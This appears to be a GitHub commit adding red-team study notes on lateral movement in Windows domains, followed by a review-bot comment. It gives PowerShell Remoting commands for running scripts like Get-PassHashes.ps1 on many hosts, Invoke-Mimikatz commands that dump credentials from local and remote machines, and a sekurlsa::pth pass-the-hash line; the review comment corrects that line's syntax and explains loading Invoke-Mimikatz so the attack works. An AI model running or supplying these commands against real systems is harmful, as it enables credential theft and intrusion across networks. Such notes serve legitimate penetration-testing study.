Add files via upload

ARZ 2021-12-07 17:43:08 +05:00 committed by GitHub
parent 394a6629aa
commit bbf04d3fbc
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23


@ -0,0 +1,63 @@
# Lateral Movement - Powershell Remoting
## PSSession
- Interactive
- Runs in a new process (wsmprovhost)
- Is stateful (session is tracked)
## Useful cmdlets
```
New-PSSession -ComputerName computername.domainanme
Enter-PSSession -ComputerName computername.domainanme
```
We can use `-Credential` to pass username/password
### To execute commands or scriptblocks
```
Invoke-Command -Scriptblock {Get-Process} -ComputerName (Get-Content <list_of_servers>)
Invoke-Command -Scriptblock {whoami;hostname} -ComputerName computername.domainname
```
### To execute scripts from files
```
Invoke-Command -FilePath C:\path\to\Get-PassHashes.ps1 -ComputerName (Get-Content <list_of_server>)
```
### Execute `Stateful` commands
```
$Sess = New-PSSession -ComputerName computername
Invoke-Command -Session $Sess -ScriptBlock {$Proc = Get-Process}
```
## Mimikatz Powershell
Powershell script for mimikatz is used for dumping credentials ,tickets without dropping mimikatz exe to disk . It is used for passing , replaying hashes. Hashes can only be dumped with administrative privilieges
### Dump credentials on local machine
```
Invoke-Mimikatz -DumpCreds
```
### Dump credentials on multiple remote machines
```
Invoke-Mimikatz -DumpCreds -ComputerName @("computer1","computer2")
```
### Generate tokens from hashes
```
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:computername.domain.name /ntlm:ntlmhash /run:powershell.exe"'
```
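Review bot: In the `sekurlsa::pth` line under "Generate tokens from hashes", `/domain:computername.domain.name` reads like a host FQDN, but `/domain:` takes the account's domain (the DNS or NetBIOS domain name, or the computer name for a local account), so a reader who copies this gets a process whose injected credentials never authenticate; suggest `/domain:domain.name` and a heading such as "Pass-the-hash (spawn a process with an NTLM hash)", since `pth` injects the hash into a new process rather than generating a token. The "Execute Stateful commands" block stops after `Invoke-Command -Session $Sess -ScriptBlock {$Proc = Get-Process}`; without a follow-up `Invoke-Command -Session $Sess -ScriptBlock {$Proc}` it never shows that `$Proc` survives between calls, which is the point of the section. The Invoke-Mimikatz section does not say where the function comes from or that it must be loaded into the session (dot-sourced from the script file or pulled into memory) before `Invoke-Mimikatz -DumpCreds` will resolve, and it should state that the `-ComputerName @("computer1","computer2")` form depends on the same PowerShell Remoting access and local-admin rights on each target that the earlier sections assume. Typos: `computername.domainanme` in both the `New-PSSession` and `Enter-PSSession` lines, `<list_of_server>` versus `<list_of_servers>` in the `-FilePath` example, and `privilieges` plus the stray spaces before the commas and full stop in the Mimikatz paragraph.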